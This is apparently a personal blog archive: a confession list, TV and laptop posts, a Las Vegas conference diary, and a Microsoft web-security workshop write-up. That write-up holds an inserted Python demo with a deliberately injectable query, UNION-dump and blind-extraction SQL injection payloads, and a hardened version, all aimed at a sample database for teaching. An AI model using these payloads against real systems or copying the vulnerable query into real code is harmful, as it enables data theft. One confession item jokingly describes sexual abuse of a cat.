Sept Choses

aka Seven Things.  aka Confess!

1. I’m a card carrying SCA fighter.  I haven’t fought in about a year, but I have every intention of returning this spring. 

(Wearing armour in the cold and wet sucks.  What sucks even more is wearing armour in the cold and wet, and then getting beaten with sticks.) 

I have a full set of armour, much of which I made myself.  Thanks to that experience, I now have the skills required to build armour, including basic metalsmithing, basic to advanced leatherworking, and expert chain maille.  Ergo, I am a total geek with a very high pain tolerance, a knack for tools, a penchant for beating grown men and women about the head and body with sticks, and a tendency to occasionally dress in funny clothes (some of which I also made myself).  Fear me.

2. I am a pyromaniac.  When I was a kid, I built a fire on my front steps out of newspaper, took a disposable camera (they were the latest thing!), stuck my hand in the fire and took a picture.  I never did develop that film, but I really really wish I had.  Heck, I might try it again someday. 

3.  I’m convinced that I will die in a car accident.  I’m hoping that the fact that I *am* convinced of that, will cause me to be more cautious.  So far so good.  *knock on fake wood laminate*

4. I’m not sure this one counts, because it’s not something I did, but I didn’t really see any rules.  And I just have to get this out – I’ve never told anyone this.  A friend of mine, who I used to hang out with a lot years ago but have since lost touch with, had a cat.  A calico cat named Q.  She was cute, and young.  And unfixed.  Sooo, my friend, who was living on very meager means at the time, couldn’t afford to have her fixed.  And then cute little Q went into heat.  My friend was working hard at home on her career as a fashion designer, and got so frustrated with Q’s incessant yowling that she one day took a Q-tip to Q.  Yep, you got it…she fucked her cat Q with a Q-tip.  Apparently it worked though, Q was…satisfied.

5. I watched the very first video on MTV.  I know lots of people who *know* that Video Killed the Radio Star was the first video, but I don’t know a lot of people who watched MTV go on the air.  It’s kind of a cool memory to have. 

6. I used to be fluent in French.  It was a pretty weird feeling when I realized it.  I was walking down the street, just thinking about the stuff I had to do, and people I needed to talk to, so in my head was “Blah blah blah blah blah”.  Except I realized, mid street crossing!, that what I was actually thinking was “ze Blah ze blah ze blah ze blah ze blah mais oui!  Zut alors!”  Have you ever thought in a foreign language without realizing it, and then realized it?  Weird.  It’s long gone, of course, since I quit using it as my relatives learned English/passed away, but those synapse highways are pretty fused.  The cool thing is that I realized not only could I pick up French again pretty quick if I needed to, I could probably do Spanish pretty darn quick too.  But what I really want to learn is Portuguese, so I can talk about saudade.  There’s no real English translation, but I am intimately familiar with the feeling.

7. I am a feeling person.  I live in my feelings.  So it should come as no surprise that I am a total romantic, with a streak of realism that’s been beaten into me.  I truly believe in love, in all its forms, and in my opinion it is one of the most important things in the world.  It is human connection.  In my mind, it is the reason we exist; to foster, create and perfect those human connections.  And as love, connection, exists on a human scale, so it exists in others as well.  Love exists in the attraction of planets, and in the attraction of electrons to protons.  It is the compulsion to unite.  But then, my beliefs have been called ‘the science of faith’. And I better quit there before I get all preachy…I have a tendency to do that when I get on this topic.

I knew I should’ve been a physicist.  Damn.  Physics is the branch of science most likely to prove the existence of G-d. 

There.  Thanks @jarvitron for tagging me, and I mean that in the nicest way.  I’ll tag @cecivirtue, @djtv, @metroknow, and @camikaos.

How I Spent My Winter Internme…err Vacation

Hiro in NYC

One bonus to the last week and a half or so of SNOWPOCALYPSE 2008!!! is that I’ve finally had the time to grind through the entire first, second and nearly third season of Heroes.   Here are a couple thoughts I have on the show:

  1. The first season was awesome.  Totally sucked me in.  The sucking noises could be heard halfway down the street, I’m sure.
  2. My favorite hero?  Hiro.  Except seriously, he needs to learn to block that nose punch to the face!  How many times has he gotten hit, 5 times? 6? 
  3. Season three was starting to lose me, until the main characters really started to polarize as good/bad (or misguided).   It was just starting to feel like the storyline was starting to fracture and lose focus, so the clear polarization really helped. 
  4. Quit messing with my head about Sylar!  Bad guy?   Good guy?   Bad guy?   Bad guy with reform potential?   Misled good guy?  Bad guy again?  Or just really really really really confused guy with waaaaay too much power and a hunger he can’t control?  Keeps me guessing, I suppose. 
  5. If I Were a Hero – If I had to pick an ability, I’d probably go with Daphne’s speedster abilities.  Straightforward and useful.  I’d never have to be stuck in traffic again, could go anywhere in the world in moments…think of the gas savings alone!  And the moral dilemmas of an ability like that would be minimal and straightforward as well.  Unlike unraveling time and space – too complicated.  And being able to absorb other abilities…how confusing and overwhelming would that get after a while?  Yikes.  The whole not-dying ala Claire thing though, that would be very cool too.
  6. One thing I want to ask @greggrunberg:  omg did you really have to wake up with a live scorpion on your head?  Dude!  That would have me in a state of insurmountable panic. 

I’m hoping my streaming allotment from Netflix is enough to get me through the rest of season 3.  Then it’s off to catch up on the last season of Battlestar Galactica just in time for the final episodes… <insert crazed speculation re: last Cylon here>

Me = Higher Functioning Mammal

Yes, I am a Higher Functioning Mammal.  To prove it, I demonstrate the use of Tools.  For example, consider the following item:

Medicine Cap

You may recognize this as an everyday cap to a medicine bottle, which is entirely correct.  However, I, as the higher functioning mammal that I am, have put it to a new use: Laptop Airspace Gap Creator.  Because apparently, the approximately 1.5k I spent on this HP Pavilion wasn’t enough to get a laptop with enough cooling power to keep my NVIDIA graphics card cool, which creates some very interestingly-timed Computer Freeze-O-Rama.  At which point I lean on my power button.  Oy.

Seriously, are you kidding me?  I bought the bestest fastest uberest l33test laptop I could get for less than 1.5K, specced it out myself, and I can’t simultaneously run iTunes, do some video editing, and keep Tweetdeck running in the background?  Seriously?  LAME!  I mean, I can understand the crashing during WoW.  I mean…bad timing and all, that’s for sure.  “ZOMG NOO!  I was just about to kill that massively uber elite lvl 80 beeelion mob with teh dragon portrait that would drop my Bracers of Ultimate Mageyness!!!!  DON’T CRASH!!!”  /wailing sob of agony!!  Yeah no worries, I got over it.  I’m kinda over WoW as a whole, for the time being, but that’s another post.

What’s my point?  Um.  Any recommendations for a laptop cooler solution?  My medicine cap is getting a little melty around the edges.

Las Vegas, Days Two Three and Four

Ok I know I’ve been slacking on this Vegas trip as far as blogging goes, but MAN am I exhausted!  Here’s a quick summary of events since Monday night:

Monday night:  Had dinner with Gunny, his girlfriend and Dai.  Nice buncha people!  And Gunny (David) you’re a bastard for paying for everyone.  If anyone else goes to Vegas, you gotta take HIM out for once, to make up for me and Darkmajic too apparently…

Tuesday: Lotsa sessions.  Info overload.  One of the sessions was an inside look into MSNBC.com, which was …depressing actually.  A lot of the problems that they had, we’re having, and the things they did to fix those problems are the opposite of what we’re doing.  It’s just sad.  I did get a much-coveted VIP pass (they only had several to hand out to people who were not already specifically invited based on a resume submission) to go to a behind-the-scenes look at a major news website covering one of the biggest stories a news site covers in a year – Election Night.  Little did I know that not only would I be rubbing elbows with the upper management of MSNBC, but they would be providing most excellent hors d’oeuvres AND an open bar.  Niiiice. 

Tuesday Evening: Anyway 7:30 rolled around, which is when they were supposed to wrap things up, but the msnbc guys decided they wanted to keep the party going, so they invited some of the attendees to join them at Mix, a swanky bar on Floor 64 of “THE Hotel”, a new high-rise suite-only hotel connected to the Mandalay Bay.  It had an open patio area.  ON the 64th floor.  Wow.  Not to mention the fact that they paid the bill for everyone who showed up.  I swear the bar tab must’ve been around 1000 bucks, with ten people drinking $6+ drinks for 3 hours, plus appetizers.  I ended up stumbling back to my hotel around 1am.  A fun night.

Wednesday: I played hooky for a bit in the morning, which I had pretty much planned on since there weren’t really any sessions going on in the morning that I wanted to attend.  So I hit the pool for a few hours, to soak up some sun while I had a chance.  I knew I wouldn’t be seeing any sun for a loooong time once I got back home.  The rest of the day was uneventful, just attending sessions. 

Wednesday night: Had dinner with mom instead at the Mandalay Bay buffet.  It had a chocolate fountain!  yuuuummm….with marshmallows.  And lychees in the fruit section!  Oi was I full.

Thursday: LOTS of good sessions to choose from today.  I had trouble picking ones, and wished I had some others with me so we could split up and compare notes afterwards.  I ended up checking out a session on accessible websites for people with disabilities (one of my personal torches at work) and another on the provider framework, which was really great.  But there were another 3-4 I would’ve liked to have gone to as well.  At least I can download all the demos and stuff after the conference!

Thursday night: Dinner with mom again, this time at one of those Station casinos.  Got paid today, so I could actually gamble some, and of course mostly lost on the slots.  I did make a little over 10 dollars back on the last one I played, and walked away feeling somewhat redeemed.  Then I played some roulette, and made 30 bucks!  Still overall at a loss, but that made it a little better…

Now I’m all packed up (mostly) and ready to check out tomorrow.  My plane doesn’t leave until 11pm tho.  I have my last workshop from 8-4, so I have to check out before then, and then leave my stuff with the bag guys.  Frankly I can’t wait to be home.  I miss my puppy.  I managed to not spend hundreds of dollars on cute little doggy tshirts and pink doggie goggles, but I did take a card!  I might have to splurge a bit if I get a decent return on tax day 😀

Can’t wait to be home, like I said.  I didn’t really like Vegas this trip.  Probably a combination of lack of money, lack of companionship, and info overload. 

You all have to call me after Friday and make plans to hang out so I can get the bitter taste of loneliness outta my mouth…

In with absolutely, positively no bang at all.

Ok.  I was planning on having this fabulous renewal, reentry, reclamation of my blogging existence.  I started with a bang, or so I thought.  Until the next day rolled around, and my video card went poopy dead.  Not completely, not yet, but more than enough to make doing anything on my computer painful.  Like trying to read something upside down through a tank of water.  You can do it, but really why go through the trouble?  Sheesh.

I forgot I had this handy little notebook, which has become my ‘backup’ notebook, lying around gettin dusty.  So I dusted it off and I’m gonna ride it hard like the bitch it is.  At least until I have enough dough for a new fancy dancy super hopped up on electrons-type video card.  The kind of card that makes gamers drool, in multiple orifices.  Yes I do the gamer thang.  Not as hard core as I used to, and not as hard core as some kids I know (and play with oy!), but I do like me some monster killin now and again. 

Anyway back to the card and notebook thing.  You’re prolly wondering why I don’t just ditch the desktop and go with the laptop; but this laptop was purchased strictly for work, so it just can’t put out the way my gaming system can (or did until a few days ago).  The resolution is for crap.  The colors are wonky.  And the gamma is super dark.  In consideration for all of you who read that and heard something that sounds like Charlie Brown’s teacher, suffice to say it’s just not powerful enough, especially in the visual category.  Plus I just spent 10 minutes hunting for my delete key.

But I can certainly post a blog or three!  Let the revolution continue…and it will be televised!  Or at least internetized.

Web Application Security

Category: Tech
The workshop was actually really good, and I’m pleased to have attended. Normally when you go to one of these Microsoft-sponsored events, especially during launch time, the ‘training’ turns out to be 90% spiel on the newest release and why you should get it, and 10% actually useful information. This one, however, was quite the opposite.

The first presenter was Dennis Hurst, Senior Consulting Engineer from SPI Dynamics. This part was primarily focused on going over the primary vulnerabilities of the major layers in Web technology; application, network and protocol. Then he went on to list the primary ways to secure those vulnerabilities. The most startling part of this section was when he used a proxy program to intercept and alter any part of the HTTP request, thereby exposing various server holes. Then, using another utility which is freely available to hackers, he demonstrated how, using SQL injection (both blind and regular), he could essentially steal the data from an entire database in seconds. That really made me sit up and take notice. As a web developer, you often hear about SQL injection, cross site scripting and request interception, but to see it and how easy it is is pretty scary. However, now I have a really solid understanding of how to protect my apps from these attacks. The simplest of these is to just use SQL stored procedures for all CRUD (create read update delete) functions, and use custom errors. Although it’s not foolproof, it makes things that much more difficult, and if you’re difficult enough, maybe they’ll move on to an easier target.
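To make the two attacks above concrete, here is an added example (mine, not code from the workshop or from SPI Dynamics) that puts a deliberately vulnerable lookup next to its parameterized equivalent and runs the payloads against both. The `users` table, the `example.com` accounts and the payload strings are all constructed for the demo; SQLite has no stored procedures, so a bound-parameter query stands in for the stored-procedure call, which is what does the real work in either case.

```python
import sqlite3

# Constructed sample database for the demo (not from the original post).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, email, is_admin) VALUES (?, ?, ?)",
        [("alice", "alice@example.com", 1),
         ("bob", "bob@example.com", 0),
         ("carol", "carol@example.com", 0)],
    )
    return conn


def lookup_vulnerable(conn, username):
    # Deliberately vulnerable: the request value is pasted into the SQL text,
    # so anything the user types is parsed as SQL, not treated as data.
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, username):
    # Bound parameter: the driver sends the value separately from the query,
    # so quotes and keywords in it can never change the statement's shape.
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


def lookup_with_custom_error(conn, username):
    # "Custom errors": the raw database error (which leaks table names,
    # syntax details and driver version) is logged server-side and the
    # client only ever sees a generic message.
    try:
        return lookup_vulnerable(conn, username)
    except sqlite3.Error as exc:
        print(f"[server log] {exc!r}")   # would go to the real log, not the response
        return "An error occurred"


def blind_extract_admin_email(conn, max_len=40):
    # Boolean-based blind injection against lookup_vulnerable(): the page
    # never shows the email, only "row found / no row", yet one yes/no
    # question per character is enough to pull the admin's email out.
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789@._-"
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            payload = (
                "bob' AND substr((SELECT email FROM users WHERE is_admin=1),"
                f"{pos},1)='{ch}' -- "
            )
            if lookup_vulnerable(conn, payload):   # row returned => guess was right
                hit = ch
                break
        if hit is None:          # ran past the end of the value
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, tautology))   # every row
    print("hardened:  ", lookup_hardened(db, tautology))     # nothing
    print("union dump:", lookup_vulnerable(db, "x' UNION SELECT username, email FROM users -- "))
    print("blind:     ", blind_extract_admin_email(db))
    print("error page:", lookup_with_custom_error(db, "'"))
```

The tautology and `UNION` payloads are the "regular" injection from the talk: one request returns the whole table. The blind routine is the other half, and it is why "we don't display errors or results" is not a defence on its own; the exploit only needs a true/false difference in the response. The caveat on stored procedures is that they help only because the call is parameterized: a procedure that builds its own SQL from its arguments with `EXEC` or `sp_executesql` and string concatenation is exactly as injectable as the first function above.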

The next presenter was Talhah Mir, Security Technologist for Microsoft. His presentation concerned web application threat analysis. Most of the threat and risk assessments are a function of intuition and experience. Mr. Mir demonstrated how you could break down the objects, roles and functions within an application, and create a very systematic threat matrix, and furthermore map each threat to a business impact. This is really important, because your business-focused clients or team members do not have to have technical security knowledge in order to clearly understand the impact of not dealing with potential threats.

The last presenter was Jeffrey Richter from Wintellect. His presentation seemed to be primarily focused on his product line, so that’s when I ducked out. It was the last half hour of the 4 hour session, so all in all I think it was a worthwhile topic. I’ve already started evangelizing at my work about the necessity of implementing security in web applications throughout the entire development cycle, not as an afterthought as it is now. I only hope that it’s not falling on deaf ears. It was ironic that not four days later, I was pulled into a meeting between my group and the data design group. One of our developers on a project was resistant to implementing stored procedures in the application despite the standards that the data group are trying to implement. I expect that I was pulled in to back my group’s side, but that certainly backfired. On the up side, I now have the undying respect and gratitude of the data group, so it’s not all bad.

Security@microsoft

Category: Tech
So I’m sitting in Building 33 on the Microsoft campus in Redmond, WA. Coming from a government facility obsessed with homeland security, I find the somewhat laid back situation here quite refreshing, considering this is, well, the Big Brother of the IT world. I drove in, parked, and walked into the building without stopping to show any ID whatsoever. Wheeeeee! How ironic, then, that the reason I’m here is for a training session about web application security. Stay tuned for one of my rare technology related posts….